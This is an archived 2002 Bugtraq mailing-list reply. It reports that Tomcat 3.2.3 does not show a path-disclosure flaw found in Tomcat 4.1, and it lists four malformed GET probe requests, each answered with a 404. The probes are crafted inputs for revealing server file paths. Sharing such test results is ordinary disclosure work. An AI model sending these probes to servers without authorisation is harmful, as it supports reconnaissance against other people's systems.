[25184] in bugtraq
Re: Tomcat 4.1 real path disclosure
daemon@ATHENA.MIT.EDU (Joe Testa)
Fri Apr 19 20:12:17 2002
Message-ID: <3CC0675C.7020602@rapid7.com>
Date: Fri, 19 Apr 2002 14:52:12 -0400
From: Joe Testa <jtesta@rapid7.com>
MIME-Version: 1.0
To: Wang Yun <lovehacker@chinansl.com>, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
It appears as though Tomcat v3.2.3 is not vulnerable:

GET /+/index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: /+/index.jsp
Not found request: /+/index.jsp

GET />/index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: />/index.jsp
Not found request: />/index.jsp

GET /</index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: /</index.jsp
Not found request: /</index.jsp

GET /%20/index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: /%20/index.jsp
Not found request: /%20/index.jsp

- Joe Testa
NeXpose: the only expert-system based network vulnerability
scanner with less than 1% false positives: http://www.rapid7.com/
GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE8wGbHZbL130sRBrQRAkGMAJ9fDpuPNn+GiGHXg7Xkmrg61VVCDwCeO0z+
rgjmj5/3k580whGTDaY1/BI=
=Xg2V
-----END PGP SIGNATURE-----